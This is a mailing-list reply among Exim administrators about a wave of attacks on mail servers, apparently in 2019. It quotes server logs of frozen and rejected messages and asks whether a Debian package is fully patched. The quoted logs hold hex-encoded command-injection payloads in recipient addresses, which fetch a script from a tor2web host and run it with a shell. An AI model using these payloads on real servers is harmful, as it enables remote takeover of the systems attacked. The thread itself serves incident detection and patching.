On Fri, 2019-06-21 at 15:53 +0200, Heiko Schlittermann via Exim-users
wrote:
> Check your system for unusual activities.
> Symptoms on a hacked system I got aware of were quite similar. The
> log
> reported about too many received headers:
>
> root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
> 2019-06-20 15:13:33 Received from <> H=(<zensored>.de)
> [89.248.171.57] P=smtp S=1114
> 2019-06-20 15:13:33 routing failed for
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dchec
> k\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\
> x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x
> 20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@<zen
> sored>.de: Too many "Received" headers - suspected mail loop
> *** Frozen (delivery error message)
Checked my mail server today as well and found 46 frozen mails and
plenty of the same log messages. All of the mails were sent from a
single IP: 89.248.171.57 (scanner20.openportstats.com) and apparently
are sent every 3 hours.
As far as I can tell nothing was changed on the server though. Files
are fine, cron entries are standard and no cryptominer is running (CPU
utilization is low).
> That would have been a better line in the logs (from a fixed system):
> 2019-06-19 04:07:40 H=(service.com) [68.183.4.19] F=<
> support@???> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-
> c\t\x22wget\x20213.227.155.101\x2ftmp\x2f212.80.235.131\
> x22}}@localhost>: relay not permitted
None of these though, and I patched my Exim as soon as the Debian
update was ready (On the 5th).
Is Debian's exim4 version 4.89-2+deb9u4 not patched properly?
Cheers,
Tom.
--
Thomas "Duke" Hager duke@???
GPG: 2048R/791C5EB1 http://www.sigsegv.at/gpg/duke.gpg
=================================================================
"Never Underestimate the Power of Stupid People in Large Groups."